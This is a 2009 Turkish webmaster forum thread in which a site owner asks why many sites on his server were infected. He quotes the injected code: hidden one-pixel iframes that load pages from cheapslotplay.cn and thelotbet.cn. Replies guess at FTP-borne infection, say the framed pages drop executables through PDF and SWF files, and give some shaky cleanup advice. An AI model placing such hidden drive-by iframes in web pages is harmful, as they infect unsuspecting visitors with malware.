• 08-04-2009, 23:41:58
    #1
    Sunucumdaki bir çok siteye alttaki iframeler atılmış ve sitelerime girince trojen uyarısı alıyorum acaba bu neden kaynaklanmış olabilir ?

    <body><iframe src="http://cheapslotplay.cn/in.cgi?income46" width=1 height=1 style="visibility: hidden"></iframe><iframe src="http://thelotbet.cn/in.cgi?income39" width=1 height=1 style="visibility: hidden"></iframe>
    
    
    <body><iframe src="http://thelotbet.cn/in.cgi?income39" width=1 height=1 style="visibility: hidden"></iframe>
  • 08-04-2009, 23:44:41
    #2
    Yeşil SEO İnt. Hiz.
    kesinlikle düşündüğün gibi...
    avast kullanıyorsun galiba...
    avast genel olarak iframe kodunu trajon olarak görüyo...
  • 09-04-2009, 00:03:35
    #3
    Sitede açık olabilir veya muhtemelen sizin makinanızdan ftp ile dosya transferi yaptığınız anda geçmiş olabilir.. iframe atılan sitelerde kullandığın script aynı mı?
  • 09-04-2009, 00:09:03
    #4
    sunucuoptimizasyon.com
    Sabonun sitesine girdiğimde r10.net in ana sayfasındaki iframe virüsü ile aynı uyarıyı veriyor kaspersky.
  • 09-04-2009, 00:13:27
    #5
    Scriptler farklı creep. Şurdaki olayı yaşıyorum; https://www.r10.net/forumda/352657-r1...s-uyarisi.html
  • 09-04-2009, 00:15:06
    #6
    Makinanı taratır mısın? Benzer bir uyarı çıkacak mı merak ediyorum...
  • 09-04-2009, 00:18:35
    #7
    Üyeliği durduruldu
    Framedeki sitelere girince .PDF dosyasından AcroRD32.exe , .SWF dosyasından wJQs.exe diye 2 dosya çalıştırıyor PC'de.
    Görev yöneticinden bak varmı sende onlar.
  • 09-04-2009, 00:20:55
    #8
    Bence r10'daki virus makinasına bulaştı ve sitesine dosya transferi yaparken yayıldı siteyede. Çünkü aynı uyarının olduğundan bahsediyor.
  • 09-04-2009, 00:23:51
    #9
    Üyeliği durduruldu
    hocam neden nasıl bulastıgını bilmiyorum ama ftp kople silmen o sitelerin ftp sine ie den baglanmaman ve pc format atman gerekli 3 kere format attım yine gitmedi en son tamirciye attırdım format öyle gitti ama suan ftp den tekrar bulastı yani ftp ve pc kople silmen gerekli yedek almadan herseyin içine bulasıyorlar

    biraz sacma ama fazla bi bilgim olmadıgından benim acımdan tek kurtulus herseyi silmek yedek alırsan ummadıgın dosyadan tekrar cıkıyor ve ftp ye ftpden de kullanıcılara gidiyor